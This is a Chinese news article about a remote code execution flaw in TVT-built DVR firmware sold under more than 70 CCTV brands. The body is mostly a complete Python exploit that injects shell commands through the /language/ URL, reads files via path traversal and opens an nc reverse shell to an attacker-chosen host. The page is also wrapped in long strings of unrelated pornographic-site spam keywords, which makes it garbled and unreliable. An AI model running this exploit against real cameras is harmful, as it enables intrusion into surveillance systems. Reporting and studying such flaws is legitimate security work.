国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

黑掉70多款監(jiān)控攝像頭?so easy!

作者:極客小默
安全 終端安全
近日,一位安全研究員發(fā)現(xiàn)70多個供應(yīng)商售賣的監(jiān)控攝像頭很容易受到遠程代碼執(zhí)行(RCE)攻擊。

近日,一位安全研究員發(fā)現(xiàn)70多個供應(yīng)商售賣的監(jiān)控攝像頭很容易受到遠程代碼執(zhí)行(RCE)攻擊。

根據(jù)安全研究員Rotem Kemer研究發(fā)現(xiàn),超過70個供應(yīng)商售賣的監(jiān)控攝像頭都很容喲受到遠程代碼執(zhí)行(RCE)攻擊。

[[164830]]

研究人員注意到供應(yīng)商正在售賣的商品使用的是同樣的、易受到RCE攻擊的固件。

在“白色標簽”的經(jīng)營模式下,各種各樣的供應(yīng)商只是簡單地將自己的標簽貼在相同的產(chǎn)品上進行售賣,但是不幸的是,他們都沒有開發(fā)軟件硬件的資格。

這個脆弱的固件是由一家中國制造商TVT開發(fā)的,Kerner分析之后發(fā)現(xiàn)了閉路電視系統(tǒng)的DVR盒易于攻擊的原因。

使用這種固件的產(chǎn)品是在一家銷售閉路電視系統(tǒng)的以色列公司購買的,其代碼也表明了這是一個脆弱的HTTP服務(wù)器。

安全漏洞依賴于服務(wù)器來檢查是否存在給定語言的目錄。如果該文件夾不存在,軟件會通過提取遠程命令來執(zhí)行打開口令。

下面是研究人員的解釋:

它會讀取URL,如果URL包含以下的內(nèi)容/language/[language]/index.html 。

如果該目錄存在的話,就會提取斜杠之間的【language】內(nèi)容并且進行檢查;如果不存在,就會直接執(zhí)行此命令

tar –zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language

這基本上就是給了我們一個遠程命令執(zhí)行的機會。

下面是影響固件漏洞的概念證明代碼:

  1. #!/usr/bin/python  
  2. # http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html  
  3. __author__ = 'Rotem Kerner' 
  4. from sys import argv  
  5. import optparse  
  6. from urlparse import urlparse  
  7. from re import compile  
  8. import socket  
  9. import requests  
  10. from requests.exceptions import ConnectionError, Timeout, ContentDecodingError  
  11. from socket import timeout  
  12. def main():  
  13.     # parse command line options and atguments  
  14.     optparseoptparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])  
  15.     optparser.add_option('-c','--check',action="store_true",dest="checkvuln"default=False,  
  16.                          help="Check if target is vulnerable")  
  17.     optparser.add_option('-e','--exploit', action="store"type="string"dest="connback",  
  18.                          help="Fire the exploit against the given target URL")  
  19.     (options, args) = optparser.parse_args()  
  20.     try:  
  21.         target = args[0]  
  22.     except IndexError:  
  23.         optparser.print_help()  
  24.         exit()  
  25.     target_url = urlparse(target)  
  26.     # validating hostname  
  27.     if not target_url.hostname:  
  28.         print "[X] supplied target "%s" is not a valid URL" % target  
  29.         optparser.print_help()  
  30.         exit()  
  31.     # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.  
  32.     socket.setdefaulttimeout(10)  
  33.     # is -c flag on check if target url is vulnrable.  
  34.     if options.checkvuln is True:  
  35.         print "[!] Checking if target "%s" is vulnable..." % target_url.netloc  
  36.         try:  
  37.             # Write file  
  38.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'  
  39.                          % (target_url.scheme, target_url.netloc))  
  40.             # Read the file.  
  41.             response = raw_url_request('%s:/%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))  
  42.             # remove it..  
  43.             raw_url_request('%s://%s/language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'  
  44.                          % (target_url.scheme, target_url.netloc))  
  45.         except (ConnectionError, Timeout, timeout) as e:  
  46.             print "[X] Unable to connect. reason: %s.  exiting..." % e.message  
  47.             return  
  48.         if response.text[0] != '1':   
  49.             print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text  
  50.             return  
  51.         print "[V] Target "%s" is vulnerable!" % target_url.netloc  
  52.     # if -e is on then fire exploit,  
  53.     if options.connback is not None:  
  54.         # Validate connect-back information.  
  55.         pattern = compile('(?P<host>[a-zA-Z0-9.-]+):(?P<port>[0-9]+)')  
  56.         match = pattern.search(options.connback)  
  57.         if not match:  
  58.             print "[X] given connect back "%s" should be in the format for host:port" % options.connback  
  59.             optparser.print_help()  
  60.             exit()  
  61.         # fire remote code execution!  
  62.         # Three ..  
  63.         try:  
  64.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'  
  65.                         % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))  
  66.         # Two ...  
  67.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'  
  68.                          % (target_url.scheme, target_url.netloc))  
  69.         # One. Left off!  
  70.             raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'  
  71.                          % (target_url.scheme, target_url.netloc))  
  72.         except (ConnectionError, Timeout, timeout) as e:  
  73.             print "[X] Unable to connect reason: %s.  exiting..." % e.message  
  74.         print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s"   
  75.               % (match.group('host'), match.group('port'))  
  76. # Disabling URL encode hack  
  77. def raw_url_request(url):  
  78.     r = requests.Request('GET')  
  79.     r.url = url  
  80.     rr = r.prepare()  
  81.     # set url without encoding  
  82.     r.url = url  
  83.     s = requests.Session()  
  84.     return s.send(r)  
  85. if __name__ == '__main__':  
  86.     main() 

他注意到目前來說有數(shù)以萬計的產(chǎn)品在使用這種HTTP服務(wù)器。他是在查詢了Shodan搜索引擎之后做出的這樣的肯定判斷,而沒在這種搜索引擎中的產(chǎn)品可能數(shù)量更多。

研究者說,“快速查詢Shodan之后發(fā)現(xiàn)其分布超過三萬;這已經(jīng)很多了,但是我相信這還只是一小部分。”

Kerner試圖向最初的制造商TVT報告這個問題,但是沒有受到任何回復(fù)。

責任編輯:藍雨淚 來源: FreeBuf
遠程代碼執(zhí)行攻擊RCE攻擊攝像頭
相關(guān)推薦

2021-03-11 10:21:55

特斯拉黑客網(wǎng)絡(luò)攻擊

2009-10-22 09:00:10

Windows 7攝像工具

2014-07-16 13:36:30

MotionLinux監(jiān)控

2019-12-26 12:30:54

攝像頭漏洞攻擊

2013-03-21 09:56:09

2024-11-29 16:51:18

2017-06-20 11:45:52

2011-04-25 09:16:10

Windows 8

2012-06-23 20:13:44

HTML5

2021-08-10 10:59:17

APP攝像頭黑產(chǎn)

2009-06-17 11:52:01

Linux

2009-08-21 17:24:18

C#控制攝像頭

2011-09-08 13:53:20

Linux攝像頭

2012-06-05 11:59:25

2023-11-06 12:57:03

2015-05-11 10:16:20

2018-06-20 11:54:54

2011-09-13 15:51:11

PhoneGap AP

2020-06-04 10:59:10

JavaScript開發(fā)技術(shù)

2021-07-30 16:22:52

攝像頭漏洞CamOver
點贊
收藏

51CTO技術(shù)棧公眾號

男人搞女人网站| 亚洲男人天堂av| 日韩av中文字幕在线播放| 啦啦啦在线视频免费观看高清中文| 国产探花一区| 色噜噜狠狠狠综合曰曰曰88av| 日韩专区一区二区| 中文字幕在线不卡| 丁香花在线影院观看在线播放| 欧美影视一区| 久久久成人的性感天堂| 国内激情视频在线观看| 欧美日韩精品一区二区三区| 美女视频免费观看网站在线| 波波电影院一区二区三区| 极品尤物一区二区三区| 久久久99免费视频| 青青免费在线视频| 亚洲午夜精品网| 日韩中文字幕在线一区| 91在线视频18| 国产欧美在线视频| 韩国成人在线| 欧美视频中文字幕在线| 国产精品对白刺激| 1024在线看片你懂得| 日韩成人精品在线| 国产精品久久久久久网站| jizz一区二区三区| 亚洲一区二区三区视频在线| 99精品国产热久久91蜜凸| 一区二区三区视频免费| 亚洲麻豆精品| 国产精品久久久久aaaa樱花| 日韩av在线中文| 狠狠色狠狠色综合人人| 欧美顶级毛片在线播放| 97精品视频在线播放| 另类尿喷潮videofree| 国产精品第100页| 综合日韩在线| 亚洲二区三区四区| 国产成人免费网站| 日日噜噜夜夜狠狠| 精品成人久久av| 欧美96在线| 日韩精品极品毛片系列视频| 亚洲精品777| 国产精品白丝jk喷水视频一区| 亚洲国产成人精品女人| 国产精品视频入口| 国内精品视频666| 色七七在线观看| 亚洲国产成人高清精品| 国产调教视频在线观看| 中文字幕日韩av| 中国av一区| 国产精品一区二区av| 久久99国内精品| 日韩欧美不卡在线| 午夜在线成人av| 色偷偷偷在线视频播放| 91精品国产91久久久久久久久| 亚洲女同一区| 国产精品12345| 日本精品视频一区二区三区| 精品国产免费人成网站| 国产精品入口福利| 国产一区二区美女| 天堂成人在线| 中文字幕精品国产| 狠狠干综合网| 青青草视频在线免费播放| 福利一区福利二区微拍刺激| 涩涩视频在线播放| 国产欧美日韩中文字幕在线| 国产一区二区成人久久免费影院| 免费观看v片在线观看| 亚洲男人天堂2023| 精品久久久久久一区| 久久人人97超碰com| 国产精品毛片久久久| 91国产在线免费观看| 国产高清视频一区| 一级日本免费的| 亚洲成色777777女色窝| 国产99亚洲| 男人艹女人在线观看| 亚洲开心激情网| 男人的天堂成人在线| 成人免费黄色网址| 国产一区二区三区久久| 狠狠热免费视频| 日韩欧美二区三区| 免费成人高清在线视频theav| 日本中文不卡| 亚洲妇女屁股眼交7| 国产精品综合网站| 成人午夜在线视频| 成人免费在线视频网| 97久久久免费福利网址| 国产九色精品成人porny| eeuss影院在线观看| 91国语精品自产拍在线观看性色 | 亚洲成人久久久久| 影音先锋在线播放| 91在线中文字幕| 色婷婷综合久久久中字幕精品久久| 国产91精品青草社区| 成人免费av网站| 天天干在线视频论坛| 国产精品裸体一区二区三区| 污片在线观看一区二区| 超碰精品在线| 少妇高清精品毛片在线视频| 一区二区三区无码高清视频| 蜜桃久久久久久| 成人在线网址| 国产中文一区二区| 色综合欧美在线视频区| 日韩一区自拍| 情se视频网在线观看| 国产精国产精品| 亚洲欧美日韩在线不卡| 成人av激情人伦小说| 国语对白做受xxxxx在线中国| 日韩精品福利在线| 蜜桃一区二区三区四区| 久久香蕉av| 日本特级黄色大片| 日韩电影中文字幕在线观看| 日韩成人dvd| 久久五月精品中文字幕| 久久国产一区二区| 欧美一区二区三区成人| 久久精品三级| 小视频免费在线观看| 日本aa在线观看| 日韩亚洲国产中文字幕| 国产亚洲欧美中文| 日韩影视在线观看| 动漫成人在线观看| 国产日本一区二区三区| 超碰在线观看97| 99视频精品免费视频| 欧美色片在线观看| 成人精品视频99在线观看免费| 99久久免费视频.com| 夜夜嗨一区二区| 色欧美片视频在线观看在线视频| 亚洲图片久久| 中文在线二区| 91亚洲永久免费精品| 欧美片在线播放| 青青草91视频| 亚洲日本在线观看视频| 一道本视频在线观看| 美女脱光内衣内裤视频久久影院| 久久xxxx精品视频| 69av成人| 国产一区二区片| 亚洲 日韩 国产第一| 亚洲成人一区二区| 在线欧美三区| 日本免费久久| 污网站在线观看免费| 91精品视频专区| 精品美女一区二区| 97久久超碰精品国产| 久久综合影院| 日本不卡三区| 激情六月天婷婷| 91av视频在线播放| 欧洲激情一区二区| 成人精品视频一区二区三区尤物| 久久精品66| 成人欧美一区| 国产一区二区三区乱码| 国产v综合ⅴ日韩v欧美大片| 欧美日韩精品欧美日韩精品一| 国产精品亚洲专一区二区三区| 色先锋久久影院av| 羞羞视频在线观看免费| av网站在线不卡| 久久亚洲午夜电影| 韩国视频理论视频久久| 911国产精品| 中文字幕成人网| 日韩成人一区二区| 秋霞影视一区二区三区| 日日夜夜天天综合入口| 免费全黄无遮挡裸体毛片| 茄子视频成人在线观看| 国模私拍一区二区三区| 欧美一级欧美三级在线观看 | 伊人av免费在线观看| 国产性生活免费视频| 国产日韩亚洲欧美| y97精品国产97久久久久久| 欧美视频精品一区|